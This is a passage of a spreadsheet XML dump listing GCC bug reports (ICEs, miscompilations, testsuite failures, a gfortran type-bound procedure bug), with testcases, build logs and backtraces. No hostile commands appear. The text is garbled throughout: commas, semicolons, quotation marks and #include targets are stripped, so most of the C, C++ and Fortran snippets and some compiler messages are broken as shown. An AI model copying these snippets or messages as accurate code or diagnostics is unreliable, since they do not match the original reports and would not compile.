extern void abort (void)
void __attribute__((noinline))
bar(int msgno va_list *args)
{
  int i
  for (i = 0 i &lt; 10 i++)
    if (i != va_arg(*args int))
      abort ()
}
void __attribute__((noinline))
foo(int msgno ...)
{
  va_list args
  int nargs
  va_start(args msgno)
  nargs = va_arg(args int)
  bar(msgno (va_list *)((nargs == 0) ? ((void *)0) : 
}
int main(void)
{
  foo(100 /* msgno */
      1 /* nargs - part of vararg list */
      0 1 2 3 4 5 6 7 8 9)
  return 0
}
It is present since we enabled stdarg optimization in the S/390 backend:
https://gcc.gnu.org/ml/gcc-patches/2005-05/msg02429.html
The field __overfloat_arg_area in the va_list struct is not set up if the va_arg expansions in the current function are found not to exceed the number of argument registers. This fails with the testcase since the va_list pointer is passed to another function - still needing that field.
The final patch will include the testcase.</t>
  </si>
  <si>
    <t>GCC-27279</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE with invalid constructor declaration</t>
  </si>
  <si>
    <t>The following invalid testcase causes an ICE since GCC 3.0:
===============================
struct A
{
  A(voidint)
}
===============================
bug.cc:3: error: '' has incomplete type
bug.cc:3: error: invalid use of 'void'
bug.cc:3: error: '' has incomplete type
bug.cc:3: error: invalid use of 'void'
bug.cc:3: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in copy_fn_p at cp/decl.c:8821
Please submit a full bug report [etc.]
Similar to PR 27278 but ICEs in a different position.
Testing a patch.</t>
  </si>
  <si>
    <t>GCC-20820</t>
  </si>
  <si>
    <t>-mlong-double-128 arithmetic error</t>
  </si>
  <si>
    <t>When I try compile code with 128 bit long double arithmetic I get a request to
file a bug report (and the compile fails).  Below is a command line the source
file the g++ output.  They are separated by %%  %%.  If you need
the intermediate files test.ii and test.s I can send them.  Without the flag
-mlong-double-128 the code compiles and runs.
%% command line %%
g++-3.4.3 -v -save-temps -mlong-double-128 test.cxx -o test &gt;&amp; g++.out
%% test.cxx %%
#include 
using namespace std
int main() {
	cout &lt;&lt; sizeof(float)= &lt;&lt; sizeof(float) &lt;&lt; endl
	cout &lt;&lt; sizeof(double)= &lt;&lt; sizeof(double) &lt;&lt; endl
	cout &lt;&lt; sizeof(long double)= &lt;&lt; sizeof(long double) &lt;&lt; endl
	long double a b
	a = b = 1.0L
	do {
		b = b/2
	} while ((a+b)!=a)
	cout &lt;&lt; long double epsilon =  &lt;&lt; b &lt;&lt; endl
	return 0
}
%% g++ output %%
Reading specs from
/opt/local/lib/gcc-3.4.3/gcc/powerpc-apple-darwin7.8.0/3.4.3/specs
Configured with:
/Users/brian/darwinports/dports/lang/gcc34/work/gcc-3.4.3/configure
--prefix=/opt/local --enable-languages=cc++f77
--libdir=/opt/local/lib/gcc-3.4.3 --infodir=/opt/local/share/info
--mandir=/opt/local/share/man --with-system-zlib --disable-nls
--program-suffix=-3.4.3
--with-gxx-include-dir=/opt/local/include/gcc-3.4.3/c++/3.4.3
Thread model: posix
gcc version 3.4.3
 /opt/local/libexec/gcc/powerpc-apple-darwin7.8.0/3.4.3/cc1plus -E -quiet -v
-D__DYNAMIC__ test.cxx -fPIC -mlong-double-128 -o test.ii
ignoring nonexistent directory
/opt/local/lib/gcc-3.4.3/gcc/powerpc-apple-darwin7.8.0/3.4.3/../../../../powerpc-apple-darwin7.8.0/include
#include ... search starts here:
#include  search starts here:
 /opt/local/include/gcc-3.4.3/c++/3.4.3
 /opt/local/include/gcc-3.4.3/c++/3.4.3/powerpc-apple-darwin7.8.0
 /opt/local/include/gcc-3.4.3/c++/3.4.3/backward
 /usr/local/include
 /opt/local/include
 /opt/local/lib/gcc-3.4.3/gcc/powerpc-apple-darwin7.8.0/3.4.3/include
 /usr/include
End of search list.
 /opt/local/libexec/gcc/powerpc-apple-darwin7.8.0/3.4.3/cc1plus -fpreprocessed
test.ii -fPIC -quiet -dumpbase test.cxx -mlong-double-128 -auxbase test -version
-o test.s
GNU C++ version 3.4.3 (powerpc-apple-darwin7.8.0)
	compiled by GNU C version 3.4.3.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
test.cxx: In function `int main()':
test.cxx:16: error: insn does not satisfy its constraints:
(insn 88 165 166 (set (reg:DI 35 f3)
        (mem/u/f:DI (lo_sum:SI (reg:SI 2 r2)
                (const:SI (minus:SI (symbol_ref/u:SI (*LC4) [flags 0x2])
                        (symbol_ref:SI ())))) [0 S8 A64])) 327
{*movdi_internal32} (nil)
    (nil))
test.cxx:16: internal compiler error: in final_scan_insn at final.c:2359
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>coomes</t>
  </si>
  <si>
    <t>GCC-51429</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE with invalid use of overloaded member function</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on trunk:
===================
struct A
{
  void foo()
  void foo(int)
  A() { foo = 0 }
}
===================
bug.cc: In constructor 'A::A()':
bug.cc:6:15: internal compiler error: tree check: expected tree that contains 'decl common' structure have 'baselink' in cxx_incomplete_type_diagnostic at cp/typeck2.c:431
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-564</t>
  </si>
  <si>
    <t>gcc 2.95.2 does not allocate array of class</t>
  </si>
  <si>
    <t>Can not create array of variables of simple class using
new operator if constructor exists and if array size
is simple expression.
Release:
gcc version 2.95.2 19991024 (release-2)
Environment:
Cygwin 1.1.2 on WinNT Ver 4.0 build 1381 Service Pack 6
How-To-Repeat:
$ g++ -c abc.cpp
abc.cpp:15: sorry not implemented: initializer contains unrecognized tree code
abc.cpp:23: sorry not implemented: initializer contains unrecognized tree code</t>
  </si>
  <si>
    <t>pavel.kudrna</t>
  </si>
  <si>
    <t>GCC-18511</t>
  </si>
  <si>
    <t>cc1plus segfaults when compiling libstdc++-v3/src/localename.cc</t>
  </si>
  <si>
    <t>For x86 cross sh4-unknown-linux-gnu 4.0.0 cc1plus segfaults
when compiling libstdc++-v3/src/localename.cc:
Program received signal SIGSEGV Segmentation fault.
0x082d8e77 in regno_clobbered_p (regno=1139 insn=0x9bb9 mode=SImode sets=0)
    at ../../ORIG/gcc/gcc/reload.c:6931
6931      unsigned int nregs = hard_regno_nregs[regno][mode]
and the backtrace is
#0  0x082d8e77 in regno_clobbered_p (regno=1139 insn=0x9bb9 mode=SImode
    sets=0) at ../../ORIG/gcc/gcc/reload.c:6931
#1  0x082fe976 in emit_output_reload_insns (chain=0x92559e0 rl=0x84c7420 j=0)
    at ../../ORIG/gcc/gcc/reload1.c:6702
#2  0x082ff237 in do_output_reload (chain=0x92559e0 rl=0x84c7420 j=0)
    at ../../ORIG/gcc/gcc/reload1.c:6911
...
Thus the cause of segfault is that regno_clobbered_p is called for
a pseudo register 1139 while the first argument REGNO of regno_clobbered_p
must be a hard register:
regno_clobbered_p (unsigned int regno rtx insn enum machine_mode mode int sets)
{
  unsigned int nregs = hard_regno_nregs[regno][mode]
  unsigned int endregno = regno + nregs</t>
  </si>
  <si>
    <t>kkojima</t>
  </si>
  <si>
    <t>GCC-40080</t>
  </si>
  <si>
    <t>[4.5 Regression] error: missing callgraph edge for call stmt</t>
  </si>
  <si>
    <t>/home/marcus/projects/gcc.trunk/BIN/bin/gcc -c  -O3  -o dplay.o dplay.i  
dplay.i:44: error: missing callgraph edge for call stmt:
# .MEM_13 = VDEF 
D.2719_6 = xcbDeletePlayerFromAllGroups ()
xDP_IF_EnumGroupsInGroup.clone.0/10(-1) [0x7fa23ece1800]: (inline copy in xDP_IF_DestroyPlayer/3) (clone of xDP_IF_EnumGroupsInGroup.clone.0/8) availability:local 38 insns body local finalized inlinable
  called by: xcbDeletePlayerFromAllGroups/9 (9.18 per call) (inlined) 
  calls: ff/4 (9.18 per call) 
dplay.i:44: internal compiler error: verify_cgraph_node failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-55525</t>
  </si>
  <si>
    <t>ICE: tree check: expected array_type have pointer_type in array_ref_low_bound at expr.c:6768</t>
  </si>
  <si>
    <t>Created attachment 28826
Testcase
Compile with `gcc -flto 1.c 2.c'.</t>
  </si>
  <si>
    <t>GCC-3157</t>
  </si>
  <si>
    <t>gives segmentation fault</t>
  </si>
  <si>
    <t>Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ file_io.cpp file_io.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus file_io.ii -quiet -dumpbase file_io.cpp -version -o file_io.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
file_io.cpp:183: no `void file_io::writeWaypoints_for_matlab 
(vector &gt; ofstream *)' member function 
declared in class `file_io'
file_io.cpp:220: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Release:
unknown
Environment:
redhat 7.0
How-To-Repeat:
gcc -v -save-temps -c file_io.cpp 2&gt; output.txt</t>
  </si>
  <si>
    <t>jevon</t>
  </si>
  <si>
    <t>GCC-39048</t>
  </si>
  <si>
    <t>gcc 4.4.0 20090131 - Extra underscore hides libgcc's soft-fp functions from Testsuite causing FAILs + naming error in libgcc</t>
  </si>
  <si>
    <t>I looked for a Component for 'libgcc' but there is no such category so I
chose 'inline-asm' as this is an extra underscore issue with '.s' files.
# gcc/xgcc -v
Using built-in specs.
Target: i386-pc-solaris2.11
Configured with: ../gcc_trunk/configure --enable-languages=adacc++fortranjavaobjcobj-c++ --enable-shared --disable-static --enable-decimal-float --with-long-double-128 --with-included-gettext --enable-stage1-checking --enable-checking=release --with-tune=k8 --with-cpu=k8 --with-arch=k8 --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld
Thread model: posix
gcc version 4.4.0 20090131 (experimental) [trunk revision 143817] (GCC) 
Note: I use GNU's 'ld' on OpenSolaris.
When I run make -i check I get this:
...
Running /usr/share/src/gcc_trunk/gcc/testsuite/gcc.dg/torture/dg-torture.exp ...
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O0  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O0  compilation failed to produce executable
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O2  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O2  compilation failed to produce executable
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O3 -fomit-frame-pointer  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O3 -fomit-frame-pointer  compilation failed to produce executable
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O3 -g  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O3 -g  compilation failed to produce executable
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -Os  (test for excess errors)
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -Os  compilation failed to produce executable
...
I tried to compile the Testsuite case gcc.dg/torture/fp-int-convert-float.c
by hand to investigate these errors:
Executing on host: /usr/share/src/gcc_build/gcc/xgcc -B/usr/share/src/gcc_build/gcc/ /usr/share/src/gcc_trunk/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c   -O0    -lm   -o ./fp-int-convert-float128.exe    (timeout = 300)
/var/tmp//cc_XaqHO.o: In function `main':
fp-int-convert-float128.c:(.text+0x3a): undefined reference to `__floatsitf'
fp-int-convert-float128.c:(.text+0x5a): undefined reference to `__fixtfsi'
fp-int-convert-float128.c:(.text+0xa1): undefined reference to `__netf2'
...
fp-int-convert-float128.c:(.text+0xa5f3): undefined reference to `__netf2'
collect2: ld returned 1 exit status
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O3 -fomit-frame-pointer  (test for excess errors)
Excess errors:
...
fp-int-convert-float128.c:(.text+0xa4f8): undefined reference to `__floatunditf'
fp-int-convert-float128.c:(.text+0xa516): undefined reference to `__fixunstfdi'
fp-int-convert-float128.c:(.text+0xa598): undefined reference to `__netf2'
WARNING: gcc.dg/torture/fp-int-convert-float128.c  -O3 -fomit-frame-pointer  compilation failed to produce executable
Where are those functions and what are they called:
# find /usr/share/src/gcc_build/i386-pc-solaris2.11/ -name *floatunditf*
/usr/share/src/gcc_build/i386-pc-solaris2.11/amd64/libgcc/_floatunditf_s.o
/usr/share/src/gcc_build/i386-pc-solaris2.11/amd64/libgcc/_floatunditf.o
/usr/share/src/gcc_build/i386-pc-solaris2.11/amd64/libgcc/_floatunditf.dep
/usr/share/src/gcc_build/i386-pc-solaris2.11/amd64/libgcc/_floatunditf_s.dep
/usr/share/src/gcc_build/i386-pc-solaris2.11/libgcc/_floatunditf.dep
/usr/share/src/gcc_build/i386-pc-solaris2.11/libgcc/_floatunditf.o
/usr/share/src/gcc_build/i386-pc-solaris2.11/libgcc/_floatunditf_s.dep
/usr/share/src/gcc_build/i386-pc-solaris2.11/libgcc/_floatunditf_s.o
Failing Command:
/usr/share/src/gcc_build/gcc/xgcc -B/usr/share/src/gcc_build/gcc/ /usr/share/src/gcc_trunk/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c   -O3 -g    -lm   -o ./fp-int-convert-float128.exe
Working Command (Note that I add -lgcc to provoke the linker):
# /usr/share/src/gcc_build/gcc/xgcc -B/usr/share/src/gcc_build/gcc/ /usr/share/src/gcc_trunk/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/floatunditf.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/floatunsitf.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/floatsitf.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfdi.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/floatditf.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfdi.c /usr/share/src/gcc_trunk/gcc/config/soft-fp/eqtf2.c -I/usr/share/src/gcc_trunk/gcc/config/i386/ -I/usr/share/src/gcc_trunk/libgcc/ -I/usr/share/src/gcc_trunk/gcc/  -O0 -lm -lgcc -o ./fp-int-convert-float128.exe
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c: In function â€˜__fixtfsiâ€™:
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixtfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c: In function â€˜__fixunstfsiâ€™:
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
/usr/share/src/gcc_trunk/gcc/config/soft-fp/fixunstfsi.c:42: warning: left shift count &gt;= width of type
#
# ./fp-int-convert-float128.exe
#
Works. Even though I used -lgcc there was no 'collision' between the 
various conversion functions. The unwanted underscores hide them.
I used the soft-fp C source files instead of relying on the double
underscored versions of these functions that are in libgcc and was
able to hand-compile and run ./fp-int-convert-float128.exe .
The Testsuite tests for these conversion functions could work
if they were fixed. These files might have first been discussed here:
http://gcc.gnu.org/ml/gcc-patches/2006-05/msg00968.html .
Rob</t>
  </si>
  <si>
    <t>GCC-23548</t>
  </si>
  <si>
    <t>[4.1 Regression] libstdc++ tests fail: could not split insn</t>
  </si>
  <si>
    <t>FAIL: 23_containers/deque/cons/clear_allocator.cc (test for excess errors)
FAIL: 27_io/basic_filebuf/sbumpc/char/2-io.cc (test for excess errors)
FAIL: 27_io/basic_filebuf/sgetc/char/2-io.cc (test for excess errors)
FAIL: 27_io/basic_filebuf/sgetn/char/2-io.cc (test for excess errors)
FAIL: 27_io/basic_filebuf/snextc/char/2-in.cc (test for excess errors)
FAIL: 27_io/basic_filebuf/snextc/char/2-io.cc (test for excess errors)
FAIL: 27_io/basic_stringbuf/setbuf/char/4.cc (test for excess errors)
all appeared on mainline on 20050823 on ia64-hp-hpux11.23.  The errors are all
of the form:
/scratch/gcc/nightly-2005-08-23-mainline/src/gcc-mainline/libstdc++-v3/testsuite/27_io/basic_stringbuf/setbuf/char/4.cc:
In function 'void test01()':
/scratch/gcc/nightly-2005-08-23-mainline/src/gcc-mainline/libstdc++-v3/testsuite/27_io/basic_stringbuf/setbuf/char/4.cc:52:
error: could not split insn
(call_insn 119 1114 1100 1
/scratch/gcc/nightly-2005-08-23-mainline/ia64-hp-hpux11.23/build_gcc/install/lib/gcc/ia64-hp-hpux11.23/4.1.0/../../../../include/c++/4.1.0/streambuf:242
(parallel [
            (set (reg:DI 8 r8)
                (call (mem:DI (const:DI (plus:DI (symbol_ref:DI
(_ZTVSt15basic_stringbufIcSt11char_traitsIcESaIcEE) [flags 0x40] &lt;var_decl
786f9460 _ZTVSt15basic_stringbufIcSt11char_traitsIcESaIcEE&gt;)
                                (const_int 64 [0x40]))) [0 S8 A64])
                    (const_int 1 [0x1])))
            (clobber (reg:DI 320 b0))
            (clobber (scratch:DI))
            (clobber (scratch:DI))
        ]) 257 {call_value_gp} (insn_list:REG_DEP_ANTI 112
(insn_list:REG_DEP_ANTI 118 (insn_list:REG_DEP_ANTI 98 (insn_list:REG_DEP_ANTI
706 (insn_list:REG_DEP_ANTI 708 (insn_list:REG_DEP_ANTI 39
(insn_list:REG_DEP_ANTI 115 (insn_list:REG_DEP_ANTI 117 (insn_list:REG_DEP_ANTI
495 (insn_list:REG_DEP_ANTI 104 (insn_list:REG_DEP_ANTI 506
(insn_list:REG_DEP_ANTI 510 (insn_list:REG_DEP_ANTI 518 (insn_list:REG_DEP_ANTI
515 (insn_list:REG_DEP_ANTI 523 (insn_list:REG_DEP_ANTI 528
(insn_list:REG_DEP_ANTI 530 (insn_list:REG_DEP_ANTI 531 (insn_list:REG_DEP_ANTI
532 (insn_list:REG_DEP_ANTI 533 (insn_list:REG_DEP_ANTI 534
(insn_list:REG_DEP_ANTI 535 (insn_list:REG_DEP_ANTI 536 (insn_list:REG_DEP_ANTI
538 (insn_list:REG_DEP_ANTI 539 (insn_list:REG_DEP_ANTI 545
(insn_list:REG_DEP_ANTI 549 (insn_list:REG_DEP_ANTI 551 (insn_list:REG_DEP_ANTI
712 (insn_list:REG_DEP_ANTI 713 (insn_list:REG_DEP_ANTI 715
(insn_list:REG_DEP_ANTI 705 (insn_list:REG_DEP_ANTI 707 (insn_list:REG_DEP_ANTI
711 (nil)))))))))))))))))))))))))))))))))))
    (expr_list:REG_DEAD (reg:DI 120 r36)
        (expr_list:REG_DEAD (reg:DI 121 r37 [ dest ])
            (expr_list:REG_DEAD (reg:DI 122 r38 [ i.171 ])
                (expr_list:REG_DEAD (reg:DI 1 r1)
                    (expr_list:REG_UNUSED (scratch:DI)
                        (expr_list:REG_UNUSED (scratch:DI)
                            (expr_list:REG_UNUSED (reg:DI 320 b0)
                                (expr_list:REG_UNUSED (reg:DI 8 r8)
                                    (expr_list:REG_EH_REGION (const_int 1 [0x1])
                                        (nil))))))))))
    (expr_list:REG_DEP_TRUE (use (reg:DI 1 r1))
        (expr_list:REG_DEP_TRUE (use (reg:DI 122 r38 [ i.171 ]))
            (expr_list:REG_DEP_TRUE (use (reg:DI 121 r37 [ dest ]))
                (expr_list:REG_DEP_TRUE (use (reg:DI 120 r36))
                    (nil))))))
/scratch/gcc/nightly-2005-08-23-mainline/src/gcc-mainline/libstdc++-v3/testsuite/27_io/basic_stringbuf/setbuf/char/4.cc:52:
internal compiler error: in final_scan_insn at final.c:2445
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45900</t>
  </si>
  <si>
    <t>[OOP] Static TBP resolved incorrectly</t>
  </si>
  <si>
    <t>The following example code provides an incorrect result using gfortran 4.6.0 20100925. I believe the code is valid and I have tested the same code with the Intel Fortran compiler (ifort) 11.1 on Linux and the results returned are correct. See the below example:
types.f90
---------------------------------------------------------
module A
implicit none
    type :: aType
    contains
        procedure :: callback
    end type aType
    contains
        subroutine callback( callback_ )
            implicit none
            class(aType) :: callback_
            print * Error: aType method called.
        end subroutine callback
        subroutine solver( callback_ )
            implicit none
            class(aType) :: callback_
            call callback_%callback()
        end subroutine solver
end module A
module B
use A only: aType
implicit none
    type extends(aType) :: bType
        integer :: i
    contains
        procedure :: callback
    end type bType
    contains
        subroutine callback( callback_ )
            implicit none
            class(bType) :: callback_
            print * Made it.
        end subroutine callback
end module B
program main
use A
use B
implicit none
    type(bType) :: bTypeInstance
    integer :: iflag
    bTypeInstance%i = 4
    call bTypeInstance%callback()
    call solver( bTypeInstance )
end program main
---------------------------------------------------------
The result produced running this code are found to be:
$ gfortran -o t types.f90
$ ./t
 Error: aType method called.
 Made it.
While ifort correctly produces the result:
 Made it.
 Made it.
A workaround is to do change use A in the main to:
use A only: solver
Using built-in specs.
COLLECT_GCC=gfortran
Target: x86_64-apple-darwin10.4.0
Configured with: ../gcc-4.6-20100925/configure --prefix=~$HOME/gcc-trunk
--enable-languages=fortran --enable-checking=release --disable-bootstrap
Thread model: posix
gcc version 4.6.0 20100925 (experimental) (GCC)</t>
  </si>
  <si>
    <t>ortp21</t>
  </si>
  <si>
    <t>GCC-58340</t>
  </si>
  <si>
    <t>[4.9 regression] gcc/cp/pt.c:7064:1: internal compiler error: in propagate_threaded_block_debug_into at tree-ssa-threadedge.c:623</t>
  </si>
  <si>
    <t>Created attachment 30756
Preprocessed source file
I started to see a new failure on my nightly amd64-unknown-freebsd8.0 tester:
/scratch/tmp/gerald/gcc-HEAD/gcc/cp/pt.c: In function â€˜tree_node* maybe_get_template_decl_from_type_decl(tree)â€™:
/scratch/tmp/gerald/gcc-HEAD/gcc/cp/pt.c:7064:1: internal compiler error: in propagate_threaded_block_debug_into at tree-ssa-threadedge.c:623
 maybe_get_template_decl_from_type_decl (tree decl)
 ^
This happens in stage3-bubble.
/scratch/tmp/gerald/OBJ-0906-1848/./prev-gcc/xg++ -B/scratch/tmp/gerald/OBJ-0906-1848/./prev-gcc/ -B/scratch/tmp/gerald/gcc-ref8-amd64/x86_64-unknown-freebsd8.4/bin/ -nostdinc++ -B/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/src/.libs -B/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/libsupc++/.libs -I/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/include/x86_64-unknown-freebsd8.4 -I/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/include -I/scratch/tmp/gerald/gcc-HEAD/libstdc++-v3/libsupc++ -L/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/src/.libs -L/scratch/tmp/gerald/OBJ-0906-1848/prev-x86_64-unknown-freebsd8.4/libstdc++-v3/libsupc++/.libs -c  -DIN_GCC_FRONTEND -g -O2 -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -Icp -I/scratch/tmp/gerald/gcc-HEAD/gcc -I/scratch/tmp/gerald/gcc-HEAD/gcc/cp -I/scratch/tmp/gerald/gcc-HEAD/gcc/../include -I/scratch/tmp/gerald/gcc-HEAD/gcc/../libcpp/include -I/home/gerald/8-amd64/include  -I/scratch/tmp/gerald/gcc-HEAD/gcc/../libdecnumber -I/scratch/tmp/gerald/gcc-HEAD/gcc/../libdecnumber/dpd -I../libdecnumber -I/scratch/tmp/gerald/gcc-HEAD/gcc/../libbacktrace    /scratch/tmp/gerald/gcc-HEAD/gcc/cp/pt.c -o cp/pt.o</t>
  </si>
  <si>
    <t>GCC-31564</t>
  </si>
  <si>
    <t>Error: Type/rank mismatch in argument</t>
  </si>
  <si>
    <t>When I compile the module listed below I get the message:
c3.f90:15.23:
        USE cdf_aux_mod
                      1
Error: Type/rank mismatch in argument 'arg_name' at (1)
g95 and Lahey do not produce error messages. Is it legal?
    MODULE cdf_aux_mod
      TYPE :: the_distribution
        INTEGER :: parameters(1)
      END TYPE the_distribution
      TYPE (the_distribution) PARAMETER :: the_beta = the_distribution((/0/))
    CONTAINS
      SUBROUTINE set_bound(arg_name)
        INTEGER INTENT (IN) :: arg_name
      END SUBROUTINE set_bound
    END MODULE cdf_aux_mod
    MODULE cdf_beta_mod
    CONTAINS
      SUBROUTINE cdf_beta()
        USE cdf_aux_mod
        INTEGER :: which
          CALL set_bound(the_beta%parameters(which))
      END SUBROUTINE cdf_beta
    END MODULE cdf_beta_mod</t>
  </si>
  <si>
    <t>michael.a.richmond</t>
  </si>
  <si>
    <t>GCC-35582</t>
  </si>
  <si>
    <t>[4.1/4.2] very simple error gives segmentation fault</t>
  </si>
  <si>
    <t>This porgram when compiled with  $ gfortran prog.f -o prog gives segmentation fault:
      real parameter  :: a = 1.
      write(*a) 'test'
      end  
Result:
test.f:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>leandromartinez.spam</t>
  </si>
  <si>
    <t>GCC-10990</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Cannot convert with dynamic_cast to a private base class from within a member function</t>
  </si>
  <si>
    <t>Hello
Please look into this bug and correct it soon.
Severity: serious: GCC is not working properly a work-around is possible.
Category: compliance with C++ standard.
Class: rejects-legal: GCC gives an error message for correct code.
Environnment: using MinGW 4.9.8.0 on Win-XP.
Description:
The Junk::AsBase() function shown below should be able to perform a dynamic_cast
on itself and return a pointer to JunkBase.  However the compiler says the base
class is inaccessible even though class Junk should be able to call any
functions in its base class and also return a pointer to itself as the base class.
Fix:
I can work around this by declaring JunkBase as a public base class.  But that
allows functions provided by JunkBase to be called by any other function and I
don't want to make those functions accessible to anybody.
This is the Junk.ii file created by the compiler.
# 1 junk.cpp
# 1 
# 1 
# 1 junk.cpp
class JunkBase
{
public:
    virtual void DoSomething( void ) = 0
protected:
    virtual ~JunkBase( void ) {}
    JunkBase( void ) {}
}
class Junk : protected JunkBase
{
public:
    Junk( void ) : JunkBase() {}
    virtual ~Junk( void ) {}
protected:
    inline JunkBase * AsBase( void )
    { return dynamic_cast( this ) }
    virtual void DoSomething( void ) { }
}
This is the command line I used to expose the bug:
g++.exe -c junk.cpp -o junk.o -IC:/Dev-Cpp/include/c++ 
-IC:/Dev-Cpp/include/c++/mingw32  -IC:/
Dev-Cpp/include/c++/backward  -IC:/Dev-Cpp/include  -IC:/Projects/Include 
-save-temps
junk.cpp: In member function `JunkBase* Junk::AsBase()':
junk.cpp:16: `JunkBase' is an inaccessible base of `Junk'
c:\Dev-Cpp\bin\make.exe: *** [junk.o] Error 1
g++ version info:
Reading specs from c:/Dev-Cpp/bin/../lib/gcc-lib/mingw32/3.2/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as
--host=mingw32 --target=min
gw32 --prefix=/mingw --enable-threads --disable-nls
--enable-languages=f77c++objcada --disable-wi
n32-registry --disable-shared
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)
Thanks for your attention to this.
Rich</t>
  </si>
  <si>
    <t>rds20</t>
  </si>
